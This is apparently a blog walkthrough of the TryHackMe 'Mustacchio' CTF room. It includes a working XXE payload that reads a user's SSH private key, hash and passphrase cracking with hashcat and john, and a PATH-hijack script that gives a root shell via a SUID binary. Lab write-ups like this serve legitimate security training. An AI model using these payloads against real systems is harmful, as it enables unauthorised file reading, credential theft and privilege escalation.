THM Mustacchio Walkthrough

TryHackMe is a popular service that offers CTF- and Walkthrough-like rooms in order to help people interested in infosec gaining new knowledge. The TryHackMe Mustacchio Room is an rather easy CTF that includes LFI through XML, hash cracking and a simple privilege escalation by manipulating the PATH variable.
THM Room: here

Information Gathering

As usual let's begin with a nmap to gain information about the THM Mustacchio machine:

sudo nmap -p 1-10000 -sV -v 10.10.62.15

This presents us three open ports:

Next, I used gobuster to enumerate the web server on port 80:

gobuster dir -u http://10.10.62.15/ -w ~/Lists/gobuster/Gobuster-Dir-Medium.txt -t 50

Gobuster found a directory called custom which contains a folder called "js" and one called "css".

CSS is probably not interesting for us so let's start with the js folder.

Inside that folder we have a file called users.bak that we can download. Using file users.bak I checked the filetype which is a SQLite 3.x database.

Now, we can either simply try to dump strings using strings users.bak or you use some sort of Database Browser like sqlitebrowser that can be installed via apt-get.

No matter how you proceed you will get the same result (a DB Browser probably looks prettier but it doesn't really matter in that case).

For this THM Mustacchio walkthrough I used strings which makes it easier to display the result here:

└──╼ $strings users.bak
SQLite format 3
tableusersusers
CREATE TABLE users(username text NOT NULL, password text NOT NULL)
]admin1868e36a6d2b17d4c2745f1659433a54d4bc5f4b

Gaining access

Using hashcat we can crack that hash (SHA1 format):

hashcat -m 100 hashfile ~/Lists/Wordlists/rockyou.txt

to display the plaintext password add a --show after hashcat to the command (or use: !! --show).

Unfortunately, the credentials can not be used to log into a SSH session but we have another webservice to enumerate (remember port 8765).

The webservice on port 8765 displays us a login panel for an admin panel; there the credentials can be used.

Taking a look at the source code of the panel we got the following comment:

0<!-- Barry, you can now SSH in using your key!-->

Also, it looks like the textbox takes in XML code as the name of the textare is "xml".

Ok, so the default location for a SSH key is /home/user/.ssh/id_rsa, let's try to display that using LFI and the following payload:

0<?xml version="1.0"?>
1  <!DOCTYPE foo [
2   <!ELEMENT foo ANY >
3   <!ENTITY nop SYSTEM "file:///home/barry/.ssh/id_rsa" >
4  ]>
5  <feed>
6    <name>&nop;</name>
7    <Subject>nop</Subject>
8    <Content>nop</Content>
9  </feed>

This read the file and displays it in the name paragraph; if the file does not exist or is not readable it won't display anything but we were successful.

Gaining access via SSH

If you try to start a SSH session using the key and ssh [email protected] -i id_rsa you will get prompted with the following:

Enter passphrase for key 'id_rsa':

which means we have to crack the password first as the keyfile is encrypted.

Luckily John The Ripper in combination with its toolset is perfect for that scenario.

Using ssh2john we can convert the keyfile into a hash that can be bruteforced using john itself.

(python ssh2john.py id_rsa > id_john)

Now, we can bruteforce the password with: john id_rsa ~/Lists/Wordlists/rockyou.txt --format=SSH

Finally you are able to log in using ssh and obtain the first flag

Privilege escalation

After navigating into the home directory of joe you can see an ELF file owned by root that got the SUID bit set and everybody is allowed to execute it.

When executing the file it simply shows us the nginx access.log file and doesn't take any user input.

I tried to extract information using strings live_log and found the command that's executed to display the logfile: tail -f /var/log/nginx/access.log.

This is a very easy privilege escalation, we just have to modify the PATH variable so that "our tail" executable gets used instead of the original one.

First I created a file called "tail" in my home directory with the following content:

0#!/usr/bin/python3
1
2import pty;
3pty.spawn('/bin/bash')

Next I modified the PATH variable using: export PATH=$PWD:$PATH, this sets my working directory (which is my home directory) in front of the original PATH string.

This results in my tail executable being executing when executing the live_log file.

Eventuall, you get a root shell and through that the system flag.

I hope you liked that TryHackMe Mustacchio Walkthrough, as always if you got any questions feel free to reach out to me.

Tags:

THM, TryHackMe, Mustacchio